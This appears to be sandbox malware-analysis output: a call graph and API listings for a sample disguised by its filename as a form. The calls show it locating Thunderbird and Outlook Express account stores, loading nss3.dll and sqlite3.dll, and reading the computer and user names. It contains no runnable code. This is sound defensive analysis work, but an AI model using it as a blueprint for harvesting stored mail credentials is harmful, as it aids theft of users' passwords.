33489 40affa 33345->33489 33349->33262 33350->33271 33351->33253 33352->33260 33353->33267 33362 406fc7 memset _mbscpy 33354->33362 33356 40709f CreateFontIndirectA 33356->33299 33358 4019e1 33357->33358 33359 4019c2 strncat 33358->33359 33360 
4019e5 memset LoadIconA 33358->33360 33359->33358 33360->33302 33361->33294 33362->33356 33363->33306 33365 407a65 33364->33365 33366 407a5b free 33364->33366 33365->33318 33366->33365 33367->33306 33369 406f37 malloc 33368->33369 33370 406f7d 33368->33370 33372 406f73 33369->33372 33373 406f58 33369->33373 33370->33306 33372->33306 33374 406f6c free 33373->33374 33375 406f5c memcpy 33373->33375 33374->33372 33375->33374 33377 407a38 33376->33377 33378 407a2d free 33376->33378 33380 406f30 3 API calls 33377->33380 33379 407a43 33378->33379 33381 40796e 7 API calls 33379->33381 33380->33379 33381->33317 33398 406f96 GetModuleFileNameA 33382->33398 33384 409805 strrchr 33385 409814 33384->33385 33386 409817 _mbscat 33384->33386 33385->33386 33386->33324 33399 44b090 33387->33399 33392 40930c 3 API calls 33393 409779 EnumResourceNamesA EnumResourceNamesA _mbscpy memset 33392->33393 33394 4097c5 LoadStringA 33393->33394 33395 4097db 33394->33395 33395->33394 33397 4097f3 33395->33397 33406 40937a memset GetPrivateProfileStringA WritePrivateProfileStringA _itoa 33395->33406 33397->33245 33398->33384 33400 40973e _mbscpy _mbscpy 33399->33400 33401 40930c 33400->33401 33402 44b090 33401->33402 33403 409319 memset GetPrivateProfileStringA 33402->33403 33404 409374 33403->33404 33405 409364 WritePrivateProfileStringA 33403->33405 33404->33392 33405->33404 33406->33395 33417 406f81 GetFileAttributesA 33407->33417 33409 409675 33410 40967a _mbscpy _mbscpy GetPrivateProfileIntA 33409->33410 33416 4096ee 33409->33416 33418 409278 GetPrivateProfileStringA 33410->33418 33412 4096c9 33419 409278 GetPrivateProfileStringA 33412->33419 33414 4096da 33420 409278 GetPrivateProfileStringA 33414->33420 33416->33246 33417->33409 33418->33412 33419->33414 33420->33416 33512 409c1c 33421->33512 33424 401e69 memset 33551 410dbb 33424->33551 33427 401ec2 33581 4070e3 strlen _mbscat _mbscpy _mbscat 33427->33581 33428 401ed4 33566 406f81 GetFileAttributesA 33428->33566 33431 401ee6 strlen 
strlen 33433 401f15 33431->33433 33434 401f28 33431->33434 33582 4070e3 strlen _mbscat _mbscpy _mbscat 33433->33582 33567 406f81 GetFileAttributesA 33434->33567 33437 401f35 33568 401c31 33437->33568 33440 401f75 33580 410a9c RegOpenKeyExA 33440->33580 33441 401c31 7 API calls 33441->33440 33443 401f91 33444 402187 33443->33444 33445 401f9c memset 33443->33445 33447 402195 ExpandEnvironmentStringsA 33444->33447 33448 4021a8 _strcmpi 33444->33448 33583 410b62 RegEnumKeyExA 33445->33583 33592 406f81 GetFileAttributesA 33447->33592 33448->33337 33448->33338 33450 40217e RegCloseKey 33450->33444 33451 401fd9 atoi 33452 401fef memset memset sprintf 33451->33452 33460 401fc9 33451->33460 33584 410b1e 33452->33584 33455 402165 33455->33450 33456 402076 memset memset strlen strlen 33456->33460 33457 4070e3 strlen _mbscat _mbscpy _mbscat 33457->33460 33458 4020dd strlen strlen 33458->33460 33459 406f81 GetFileAttributesA 33459->33460 33460->33450 33460->33451 33460->33455 33460->33456 33460->33457 33460->33458 33460->33459 33461 402167 _mbscpy 33460->33461 33591 410b62 RegEnumKeyExA 33460->33591 33461->33450 33463 40c422 33462->33463 33464 40c425 _mbscat _mbscpy _mbscpy 33462->33464 33463->33464 33465 40c49d 33464->33465 33466 40c512 33465->33466 33467 40c502 GetWindowPlacement 33465->33467 33468 40c538 33466->33468 33613 4017d2 GetSystemMetrics GetSystemMetrics SetWindowPos 33466->33613 33467->33466 33606 409b31 33468->33606 33472 40ba28 33473 40ba87 33472->33473 33479 40ba3c 33472->33479 33616 406c62 LoadCursorA SetCursor 33473->33616 33475 40ba8c 33617 410a9c RegOpenKeyExA 33475->33617 33618 404785 33475->33618 33621 403c16 33475->33621 33697 4107f1 33475->33697 33700 404734 33475->33700 33476 40ba43 _mbsicmp 33476->33479 33477 40baa0 33478 407e30 _strcmpi 33477->33478 33482 40bab0 33478->33482 33479->33473 33479->33476 33708 40b5e5 10 API calls 33479->33708 33480 40bafa SetCursor 33480->33345 33482->33480 33483 40baf1 qsort 33482->33483 33483->33480 34066 409ded 
SendMessageA ??2@YAPAXI ??3@YAXPAX 33489->34066 33491 40b00e 33492 40b016 33491->33492 33493 40b01f GetStdHandle 33491->33493 34067 406d1a CreateFileA 33492->34067 33495 40b01c 33493->33495 33496 40b035 33495->33496 33497 40b12d 33495->33497 34068 406c62 LoadCursorA SetCursor 33496->34068 34072 406d77 9 API calls 33497->34072 33500 40b136 33511 40c580 28 API calls 33500->33511 33501 40b087 33508 40b0a1 33501->33508 34070 40a699 12 API calls 33501->34070 33502 40b042 33502->33501 33502->33508 34069 40a57c strlen WriteFile 33502->34069 33505 40b0d6 33506 40b116 CloseHandle 33505->33506 33507 40b11f SetCursor 33505->33507 33506->33507 33507->33500 33508->33505 34071 406d77 9 API calls 33508->34071 33510->33338 33511->33342 33524 409a32 33512->33524 33515 409c80 memcpy memcpy 33516 409cda 33515->33516 33516->33515 33517 409d18 ??2@YAPAXI ??2@YAPAXI 33516->33517 33518 408db6 12 API calls 33516->33518 33520 409d54 ??2@YAPAXI 33517->33520 33521 409d8b 33517->33521 33518->33516 33520->33521 33521->33521 33534 409b9c 33521->33534 33523 4023c1 33523->33424 33525 409a44 33524->33525 33526 409a3d ??3@YAXPAX 33524->33526 33527 409a52 33525->33527 33528 409a4b ??3@YAXPAX 33525->33528 33526->33525 33529 409a63 33527->33529 33530 409a5c ??3@YAXPAX 33527->33530 33528->33527 33531 409a83 ??2@YAPAXI ??2@YAPAXI 33529->33531 33532 409a73 ??3@YAXPAX 33529->33532 33533 409a7c ??3@YAXPAX 33529->33533 33530->33529 33531->33515 33532->33533 33533->33531 33535 407a55 free 33534->33535 33536 409ba5 33535->33536 33537 407a55 free 33536->33537 33538 409bad 33537->33538 33539 407a55 free 33538->33539 33540 409bb5 33539->33540 33541 407a55 free 33540->33541 33542 409bbd 33541->33542 33543 407a1f 4 API calls 33542->33543 33544 409bd0 33543->33544 33545 407a1f 4 API calls 33544->33545 33546 409bda 33545->33546 33547 407a1f 4 API calls 33546->33547 33548 409be4 33547->33548 33549 407a1f 4 API calls 33548->33549 33550 409bee 33549->33550 33550->33523 33552 410d0e 2 API calls 33551->33552 33553 410dca 
33552->33553 33554 410dfd memset 33553->33554 33593 4070ae 33553->33593 33556 410e1d 33554->33556 33596 410a9c RegOpenKeyExA 33556->33596 33559 401e9e strlen strlen 33559->33427 33559->33428 33560 410e4a 33561 410e7f _mbscpy 33560->33561 33597 410d3d _mbscpy 33560->33597 33561->33559 33563 410e5b 33598 410add RegQueryValueExA 33563->33598 33565 410e73 RegCloseKey 33565->33561 33566->33431 33567->33437 33599 410a9c RegOpenKeyExA 33568->33599 33570 401c4c 33571 401cad 33570->33571 33600 410add RegQueryValueExA 33570->33600 33571->33440 33571->33441 33573 401c6a 33574 401c71 strchr 33573->33574 33575 401ca4 RegCloseKey 33573->33575 33574->33575 33576 401c85 strchr 33574->33576 33575->33571 33576->33575 33577 401c94 33576->33577 33601 406f06 strlen 33577->33601 33579 401ca1 33579->33575 33580->33443 33581->33428 33582->33434 33583->33460 33604 410a9c RegOpenKeyExA 33584->33604 33586 410b34 33587 410b5d 33586->33587 33605 410add RegQueryValueExA 33586->33605 33587->33460 33589 410b4c RegCloseKey 33589->33587 33591->33460 33592->33448 33594 4070bd GetVersionExA 33593->33594 33595 4070ce 33593->33595 33594->33595 33595->33554 33595->33559 33596->33560 33597->33563 33598->33565 33599->33570 33600->33573 33602 406f17 33601->33602 33603 406f1a memcpy 33601->33603 33602->33603 33603->33579 33604->33586 33605->33589 33607 409b40 33606->33607 33609 409b4e 33606->33609 33614 409901 memset SendMessageA 33607->33614 33610 409b99 33609->33610 33611 409b8b 33609->33611 33610->33472 33615 409868 SendMessageA 33611->33615 33613->33468 33614->33609 33615->33610 33616->33475 33617->33477 33619 4047a3 33618->33619 33620 404799 FreeLibrary 33618->33620 33619->33477 33620->33619 33622 4107f1 FreeLibrary 33621->33622 33623 403c30 LoadLibraryA 33622->33623 33624 403c74 33623->33624 33625 403c44 GetProcAddress 33623->33625 33627 4107f1 FreeLibrary 33624->33627 33625->33624 33626 403c5e 33625->33626 33626->33624 33630 403c6b 33626->33630 33628 403c7b 33627->33628 33629 404734 3 API calls 
33628->33629 33631 403c86 33629->33631 33630->33628 33709 4036e5 33631->33709 33634 4036e5 27 API calls 33635 403c9a 33634->33635 33636 4036e5 27 API calls 33635->33636 33637 403ca4 33636->33637 33638 4036e5 27 API calls 33637->33638 33639 403cae 33638->33639 33721 4085d2 33639->33721 33647 403ce5 33648 403cf7 33647->33648 33902 402bd1 40 API calls 33647->33902 33767 410a9c RegOpenKeyExA 33648->33767 33651 403d0a 33652 403d1c 33651->33652 33903 402bd1 40 API calls 33651->33903 33768 402c5d 33652->33768 33656 4070ae GetVersionExA 33657 403d31 33656->33657 33786 410a9c RegOpenKeyExA 33657->33786 33659 403d51 33660 403d61 33659->33660 33904 402b22 47 API calls 33659->33904 33787 410a9c RegOpenKeyExA 33660->33787 33663 403d87 33664 403d97 33663->33664 33905 402b22 47 API calls 33663->33905 33788 410a9c RegOpenKeyExA 33664->33788 33667 403dbd 33668 403dcd 33667->33668 33906 402b22 47 API calls 33667->33906 33789 410808 33668->33789 33672 404785 FreeLibrary 33673 403de8 33672->33673 33793 402fdb 33673->33793 33676 402fdb 34 API calls 33677 403e00 33676->33677 33809 4032b7 33677->33809 33686 403e3b 33688 403e73 33686->33688 33689 403e46 _mbscpy 33686->33689 33856 40fb00 33688->33856 33908 40f334 334 API calls 33689->33908 33698 410807 33697->33698 33699 4107fc FreeLibrary 33697->33699 33698->33477 33699->33698 33701 404785 FreeLibrary 33700->33701 33702 40473b LoadLibraryA 33701->33702 33703 40474c GetProcAddress 33702->33703 33704 40476e 33702->33704 33703->33704 33705 404764 33703->33705 33706 404781 33704->33706 33707 404785 FreeLibrary 33704->33707 33705->33704 33706->33477 33707->33706 33708->33479 33710 4036fb 33709->33710 33713 4037c5 33709->33713 33909 410863 UuidFromStringA UuidFromStringA memcpy CoTaskMemFree 33710->33909 33712 40370e 33712->33713 33714 403716 strchr 33712->33714 33713->33634 33714->33713 33715 403730 33714->33715 33910 4021b6 memset 33715->33910 33717 40373f _mbscpy _mbscpy strlen 33718 4037a4 _mbscpy 33717->33718 33719 403789 sprintf 
33717->33719 33911 4023e5 16 API calls 33718->33911 33719->33718 33722 4085e2 33721->33722 33912 4082cd 11 API calls 33722->33912 33726 408600 33727 403cba 33726->33727 33728 40860b memset 33726->33728 33739 40821d 33727->33739 33915 410b62 RegEnumKeyExA 33728->33915 33730 408637 33731 4086d2 RegCloseKey 33730->33731 33733 40865c memset 33730->33733 33916 410a9c RegOpenKeyExA 33730->33916 33919 410b62 RegEnumKeyExA 33730->33919 33731->33727 33917 410add RegQueryValueExA 33733->33917 33736 408694 33918 40848b 10 API calls 33736->33918 33738 4086ab RegCloseKey 33738->33730 33920 410a9c RegOpenKeyExA 33739->33920 33741 40823f 33742 403cc6 33741->33742 33743 408246 memset 33741->33743 33751 4086e0 33742->33751 33921 410b62 RegEnumKeyExA 33743->33921 33745 4082bf RegCloseKey 33745->33742 33747 40826f 33747->33745 33922 410a9c RegOpenKeyExA 33747->33922 33923 4080ed 11 API calls 33747->33923 33924 410b62 RegEnumKeyExA 33747->33924 33750 4082a2 RegCloseKey 33750->33747 33925 4045db 33751->33925 33756 408737 wcslen 33757 4088ef 33756->33757 33763 40876a 33756->33763 33933 404656 33757->33933 33758 40877a wcsncmp 33758->33763 33760 404734 3 API calls 33760->33763 33761 404785 FreeLibrary 33761->33763 33762 408812 memset 33762->33763 33764 40883c memcpy wcschr 33762->33764 33763->33757 33763->33758 33763->33760 33763->33761 33763->33762 33763->33764 33765 4088c3 LocalFree 33763->33765 33936 40466b _mbscpy 33763->33936 33764->33763 33765->33763 33766 410a9c RegOpenKeyExA 33766->33647 33767->33651 33937 410a9c RegOpenKeyExA 33768->33937 33770 402c7a 33771 402da5 33770->33771 33772 402c87 memset 33770->33772 33771->33656 33938 410b62 RegEnumKeyExA 33772->33938 33774 402d9c RegCloseKey 33774->33771 33775 410b1e 3 API calls 33776 402ce4 memset sprintf 33775->33776 33939 410a9c RegOpenKeyExA 33776->33939 33778 402d28 33779 402d3a sprintf 33778->33779 33940 402bd1 40 API calls 33778->33940 33941 410a9c RegOpenKeyExA 33779->33941 33782 402cb2 33782->33774 33782->33775 33785 402d9a 
33782->33785 33942 402bd1 40 API calls 33782->33942 33943 410b62 RegEnumKeyExA 33782->33943 33785->33774 33786->33659 33787->33663 33788->33667 33790 410816 33789->33790 33791 4107f1 FreeLibrary 33790->33791 33792 403ddd 33791->33792 33792->33672 33944 410a9c RegOpenKeyExA 33793->33944 33795 402ff9 33796 403006 memset 33795->33796 33797 40312c 33795->33797 33945 410b62 RegEnumKeyExA 33796->33945 33797->33676 33799 403122 RegCloseKey 33799->33797 33800 410b1e 3 API calls 33801 403058 memset sprintf 33800->33801 33946 410a9c RegOpenKeyExA 33801->33946 33803 403033 33803->33799 33803->33800 33804 4030a2 memset 33803->33804 33805 410b62 RegEnumKeyExA 33803->33805 33807 4030f9 RegCloseKey 33803->33807 33948 402db3 26 API calls 33803->33948 33947 410b62 RegEnumKeyExA 33804->33947 33805->33803 33807->33803 33810 4032d5 33809->33810 33811 4033a9 33809->33811 33949 4021b6 memset 33810->33949 33824 4034e4 memset memset 33811->33824 33813 4032e1 33950 403166 strlen GetPrivateProfileStringA strchr strlen memcpy 33813->33950 33815 4032ea 33816 4032f8 memset GetPrivateProfileSectionA 33815->33816 33951 4023e5 16 API calls 33815->33951 33816->33811 33821 40332f 33816->33821 33818 40339b strlen 33818->33811 33818->33821 33820 403350 strchr 33820->33821 33821->33811 33821->33818 33952 4021b6 memset 33821->33952 33953 403166 strlen GetPrivateProfileStringA strchr strlen memcpy 33821->33953 33954 4023e5 16 API calls 33821->33954 33825 410b1e 3 API calls 33824->33825 33826 40353f 33825->33826 33827 40357f 33826->33827 33828 403546 _mbscpy 33826->33828 33832 403985 33827->33832 33955 406d55 strlen _mbscat 33828->33955 33830 403565 _mbscat 33956 4033f0 19 API calls 33830->33956 33957 40466b _mbscpy 33832->33957 33836 4039aa 33837 4039ff 33836->33837 33958 40f460 memset memset 33836->33958 33979 40f6e2 33836->33979 33995 4038e8 21 API calls 33836->33995 33839 404785 FreeLibrary 33837->33839 33840 403a0b 33839->33840 33841 4037ca memset memset 33840->33841 34003 444551 memset 33841->34003 
33844 4038e2 33844->33686 33907 40f334 334 API calls 33844->33907 33846 40382e 33847 406f06 2 API calls 33846->33847 33848 403843 33847->33848 33849 406f06 2 API calls 33848->33849 33850 403855 strchr 33849->33850 33851 403884 _mbscpy 33850->33851 33852 403897 strlen 33850->33852 33853 4038bf _mbscpy 33851->33853 33852->33853 33854 4038a4 sprintf 33852->33854 34015 4023e5 16 API calls 33853->34015 33854->33853 33857 44b090 33856->33857 33858 40fb10 RegOpenKeyExA 33857->33858 33859 403e7f 33858->33859 33860 40fb3b RegOpenKeyExA 33858->33860 33870 40f96c 33859->33870 33861 40fb55 RegQueryValueExA 33860->33861 33862 40fc2d RegCloseKey 33860->33862 33863 40fc23 RegCloseKey 33861->33863 33864 40fb84 33861->33864 33862->33859 33863->33862 33865 404734 3 API calls 33864->33865 33866 40fb91 33865->33866 33866->33863 33867 40fc19 LocalFree 33866->33867 33868 40fbdd memcpy memcpy 33866->33868 33867->33863 34020 40f802 11 API calls 33868->34020 33871 4070ae GetVersionExA 33870->33871 33872 40f98d 33871->33872 33873 4045db 7 API calls 33872->33873 33881 40f9a9 33873->33881 33874 40fae6 33875 404656 FreeLibrary 33874->33875 33876 403e85 33875->33876 33882 4442ea memset 33876->33882 33877 40fa13 memset WideCharToMultiByte 33878 40fa43 _strnicmp 33877->33878 33877->33881 33879 40fa5b WideCharToMultiByte 33878->33879 33878->33881 33880 40fa88 WideCharToMultiByte 33879->33880 33879->33881 33880->33881 33881->33874 33881->33877 33883 410dbb 9 API calls 33882->33883 33884 444329 33883->33884 34021 40759e strlen strlen 33884->34021 33889 410dbb 9 API calls 33890 444350 33889->33890 33891 40759e 3 API calls 33890->33891 33892 44435a 33891->33892 33893 444212 65 API calls 33892->33893 33894 444366 memset memset 33893->33894 33895 410b1e 3 API calls 33894->33895 33896 4443b9 ExpandEnvironmentStringsA strlen 33895->33896 33897 4443f4 _strcmpi 33896->33897 33898 4443e5 33896->33898 33899 403e91 33897->33899 33900 44440c 33897->33900 33898->33897 33899->33477 33901 444212 65 API calls 
33900->33901 33901->33899 33902->33648 33903->33652 33904->33660 33905->33664 33906->33668 33907->33686 33908->33688 33909->33712 33910->33717 33911->33713 33913 40841c 33912->33913 33914 410a9c RegOpenKeyExA 33913->33914 33914->33726 33915->33730 33916->33730 33917->33736 33918->33738 33919->33730 33920->33741 33921->33747 33922->33747 33923->33750 33924->33747 33926 404656 FreeLibrary 33925->33926 33927 4045e3 LoadLibraryA 33926->33927 33928 404651 33927->33928 33929 4045f4 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 33927->33929 33928->33756 33928->33757 33930 40463d 33929->33930 33931 404643 33930->33931 33932 404656 FreeLibrary 33930->33932 33931->33928 33932->33928 33934 403cd2 33933->33934 33935 40465c FreeLibrary 33933->33935 33934->33766 33935->33934 33936->33763 33937->33770 33938->33782 33939->33778 33940->33779 33941->33782 33942->33782 33943->33782 33944->33795 33945->33803 33946->33803 33947->33803 33948->33803 33949->33813 33950->33815 33951->33816 33952->33820 33953->33821 33954->33821 33955->33830 33956->33827 33957->33836 33996 4078ba 33958->33996 33961 4078ba _mbsnbcat 33962 40f5a3 RegOpenKeyExA 33961->33962 33963 40f5c3 RegQueryValueExA 33962->33963 33964 40f6d9 33962->33964 33965 40f6d0 RegCloseKey 33963->33965 33966 40f5f0 33963->33966 33964->33836 33965->33964 33966->33965 33967 40f675 33966->33967 34000 40466b _mbscpy 33966->34000 33967->33965 34001 4012ee strlen 33967->34001 33969 40f611 33971 404734 3 API calls 33969->33971 33976 40f616 33971->33976 33972 40f69e RegQueryValueExA 33972->33965 33973 40f6c1 33972->33973 33973->33965 33974 40f66a 33975 404785 FreeLibrary 33974->33975 33975->33967 33976->33974 33977 40f661 LocalFree 33976->33977 33978 40f645 memcpy 33976->33978 33977->33974 33978->33977 34002 40466b _mbscpy 33979->34002 33981 40f6fa 33982 4045db 7 API calls 33981->33982 33983 40f708 33982->33983 33984 40f7e2 33983->33984 33985 404734 3 API calls 33983->33985 33986 404656 FreeLibrary 33984->33986 
33990 40f715 33985->33990 33987 40f7f1 33986->33987 33988 404785 FreeLibrary 33987->33988 33989 40f7fc 33988->33989 33989->33836 33990->33984 33991 40f797 WideCharToMultiByte 33990->33991 33992 40f7b8 strlen 33991->33992 33993 40f7d9 LocalFree 33991->33993 33992->33993 33994 40f7c8 _mbscpy 33992->33994 33993->33984 33994->33993 33995->33836 33997 4078e6 33996->33997 33998 4078c7 _mbsnbcat 33997->33998 33999 4078ea 33997->33999 33998->33997 33999->33961 34000->33969 34001->33972 34002->33981 34016 410a9c RegOpenKeyExA 34003->34016 34005 44458b 34006 40381a 34005->34006 34017 410add RegQueryValueExA 34005->34017 34006->33844 34014 4021b6 memset 34006->34014 34008 4445dc RegCloseKey 34008->34006 34009 4445a4 34009->34008 34018 410add RegQueryValueExA 34009->34018 34011 4445c1 34011->34008 34019 444879 30 API calls 34011->34019 34013 4445da 34013->34008 34014->33846 34015->33844 34016->34005 34017->34009 34018->34011 34019->34013 34020->33867 34022 4075c9 34021->34022 34023 4075bb _mbscat 34021->34023 34024 444212 34022->34024 34023->34022 34041 407e9d 34024->34041 34027 44424d 34028 444274 34027->34028 34029 444258 34027->34029 34049 407ef8 34027->34049 34030 407e9d 9 API calls 34028->34030 34062 444196 52 API calls 34029->34062 34037 4442a0 34030->34037 34032 407ef8 9 API calls 34032->34037 34033 4442ce 34059 407f90 34033->34059 34037->34032 34037->34033 34039 444212 65 API calls 34037->34039 34063 407e62 strcmp strcmp 34037->34063 34038 407f90 FindClose 34040 4442e4 34038->34040 34039->34037 34040->33889 34042 407f90 FindClose 34041->34042 34043 407eaa 34042->34043 34044 406f06 2 API calls 34043->34044 34045 407ebd strlen strlen 34044->34045 34046 407ee1 34045->34046 34047 407eea 34045->34047 34064 4070e3 strlen _mbscat _mbscpy _mbscat 34046->34064 34047->34027 34050 407f03 FindFirstFileA 34049->34050 34051 407f24 FindNextFileA 34049->34051 34052 407f3f 34050->34052 34053 407f46 strlen strlen 34051->34053 34054 407f3a 34051->34054 34052->34053 34056 407f7f 
34052->34056 34053->34056 34057 407f76 34053->34057 34055 407f90 FindClose 34054->34055 34055->34052 34056->34027 34065 4070e3 strlen _mbscat _mbscpy _mbscat 34057->34065 34060 407fa3 34059->34060 34061 407f99 FindClose 34059->34061 34060->34038 34061->34060 34062->34027 34063->34037 34064->34047 34065->34056 34066->33491 34067->33495 34068->33502 34069->33501 34070->33508 34071->33505 34072->33500 34417 43ffc8 18 API calls 34231 4281cc 15 API calls __fprintf_l 34419 4383cc 110 API calls __fprintf_l 34232 4275d3 41 API calls 34420 4153d3 22 API calls __fprintf_l 34233 444dd7 _XcptFilter 34425 4013de 15 API calls 34427 425115 111 API calls __fprintf_l 34428 43f7db 18 API calls 34431 410be6 WritePrivateProfileStringA GetPrivateProfileStringA 34235 4335ee 16 API calls __fprintf_l 34433 429fef 11 API calls 34236 444deb _exit _c_exit 34434 40bbf0 138 API calls 34239 425115 79 API calls __fprintf_l 34438 437ffa 22 API calls 34243 4021ff 14 API calls 34244 43f5fc 149 API calls 34439 40e381 9 API calls 34246 405983 40 API calls 34247 42b186 27 API calls __fprintf_l 34248 427d86 76 API calls 34249 403585 20 API calls 34251 42e58e 18 API calls __fprintf_l 34254 425115 75 API calls __fprintf_l 34256 401592 8 API calls 33159 410b92 33162 410a6b 33159->33162 33161 410bb2 33163 410a77 33162->33163 33164 410a89 GetPrivateProfileIntA 33162->33164 33167 410983 memset _itoa WritePrivateProfileStringA 33163->33167 33164->33161 33166 410a84 33166->33161 33167->33166 34443 434395 16 API calls 34258 441d9c memcmp 34445 43f79b 119 API calls 34259 40c599 43 API calls 34446 426741 87 API calls 34263 4401a6 21 API calls 34265 426da6 memcpy memset memset memcpy 34266 4335a5 15 API calls 34268 4299ab memset memset memcpy memset memset 34269 40b1ab 8 API calls 34451 425115 76 API calls __fprintf_l 34455 4113b2 18 API calls 2 library calls 34459 40a3b8 memset sprintf SendMessageA 34073 410bbc 34076 4109cf 34073->34076 34077 4109dc 34076->34077 34078 410a23 memset GetPrivateProfileStringA 
34077->34078 34079 4109ea memset 34077->34079 34084 407646 strlen 34078->34084 34089 4075cd sprintf memcpy 34079->34089 34082 410a0c WritePrivateProfileStringA 34083 410a65 34082->34083 34085 40765a 34084->34085 34086 40765c 34084->34086 34085->34083 34088 4076a3 34086->34088 34090 40737c strtoul 34086->34090 34088->34083 34089->34082 34090->34086 34271 40b5bf memset memset _mbsicmp

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 129 4082cd-40841a memset * 4 GetComputerNameA GetUserNameA MultiByteToWideChar * 2 strlen * 2 memcpy 130 408450-408453 129->130 131 40841c 129->131 133 408484-408488 130->133 134 408455-40845e 130->134 132 408422-40842b 131->132 135 408432-40844e 132->135 136 40842d-408431 132->136 137 408460-408464 134->137 138 408465-408482 134->138 135->130 135->132 136->135 137->138 138->133 138->134
                                                                                                              APIs
                                                                                                              • memset.MSVCRT ref: 0040832F
                                                                                                              • memset.MSVCRT ref: 00408343
                                                                                                              • memset.MSVCRT ref: 0040835F
                                                                                                              • memset.MSVCRT ref: 00408376
                                                                                                              • GetComputerNameA.KERNEL32(?,?), ref: 00408398
                                                                                                              • GetUserNameA.ADVAPI32(?,?), ref: 004083AC
                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083CB
                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083E0
                                                                                                              • strlen.MSVCRT ref: 004083E9
                                                                                                              • strlen.MSVCRT ref: 004083F8
                                                                                                              • memcpy.MSVCRT(?,000000A3,00000010,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040840A
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.1967791996.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000009.00000002.1967791996.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000009.00000002.1967791996.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: memset$ByteCharMultiNameWidestrlen$ComputerUsermemcpy
                                                                                                              • String ID: 5$H$O$b$i$}$}
                                                                                                              • API String ID: 1832431107-3760989150
                                                                                                              • Opcode ID: a5ed1eb31af54c8a3c73713876d0dfdb02d87ab57461c694f2cbdc33214a2147
                                                                                                              • Instruction ID: 30108760c83c1dc53a9521f9e33a2a4701cfdd5ab922e7e2e5f0797d9ff7fddf
                                                                                                              • Opcode Fuzzy Hash: a5ed1eb31af54c8a3c73713876d0dfdb02d87ab57461c694f2cbdc33214a2147
                                                                                                              • Instruction Fuzzy Hash: BC51F67180029DAEDB11CFA4CC81BEEBBBCEF49314F0441AAE555E7182D7389B45CB65
                                                                                                              APIs
                                                                                                              • FindFirstFileA.KERNELBASE(?,?,?,?,00444270,*.oeaccount,ACD,?,00000104), ref: 00407F0E
                                                                                                              • FindNextFileA.KERNELBASE(?,?,?,?,00444270,*.oeaccount,ACD,?,00000104), ref: 00407F2C
                                                                                                              • strlen.MSVCRT ref: 00407F5C
                                                                                                              • strlen.MSVCRT ref: 00407F64
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.1967791996.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000009.00000002.1967791996.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000009.00000002.1967791996.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: FileFindstrlen$FirstNext
                                                                                                              • String ID: ACD
                                                                                                              • API String ID: 379999529-620537770
                                                                                                              • Opcode ID: ac238b99766b2c560e4788d49261b3e8246b44fda50c364b2703e5efa62775d4
                                                                                                              • Instruction ID: 71029bc486f6697817f6bb289966da7394398bd7116df025ae0cbd4ece6cffc9
                                                                                                              • Opcode Fuzzy Hash: ac238b99766b2c560e4788d49261b3e8246b44fda50c364b2703e5efa62775d4
                                                                                                              • Instruction Fuzzy Hash: 581170769092029FD354DB34D884ADBB3D8DB45725F100A2FF459D21D1EB38B9408B5A

                                                                                                              Control-flow Graph

                                                                                                              APIs
                                                                                                              • memset.MSVCRT ref: 00401E8B
                                                                                                              • strlen.MSVCRT ref: 00401EA4
                                                                                                              • strlen.MSVCRT ref: 00401EB2
                                                                                                              • strlen.MSVCRT ref: 00401EF8
                                                                                                              • strlen.MSVCRT ref: 00401F06
                                                                                                              • memset.MSVCRT ref: 00401FB1
                                                                                                              • atoi.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00401FE0
                                                                                                              • memset.MSVCRT ref: 00402003
                                                                                                              • sprintf.MSVCRT ref: 00402030
                                                                                                                • Part of subcall function 00410B1E: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                                                                                                              • memset.MSVCRT ref: 00402086
                                                                                                              • memset.MSVCRT ref: 0040209B
                                                                                                              • strlen.MSVCRT ref: 004020A1
                                                                                                              • strlen.MSVCRT ref: 004020AF
                                                                                                              • strlen.MSVCRT ref: 004020E2
                                                                                                              • strlen.MSVCRT ref: 004020F0
                                                                                                              • memset.MSVCRT ref: 00402018
                                                                                                                • Part of subcall function 004070E3: _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
                                                                                                                • Part of subcall function 004070E3: _mbscat.MSVCRT ref: 004070FA
                                                                                                              • _mbscpy.MSVCRT(?,00000000), ref: 00402177
                                                                                                              • RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00402181
                                                                                                              • ExpandEnvironmentStringsA.KERNEL32(%programfiles%\Mozilla Thunderbird,?,00000104,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040219C
                                                                                                                • Part of subcall function 00406F81: GetFileAttributesA.KERNELBASE(?,00409675,?,0040972B,00000000,?,00000000,00000104,?), ref: 00406F85
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.1967791996.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000009.00000002.1967791996.0000000000456000.00000040.80000000.00040000.00000000.sdmp
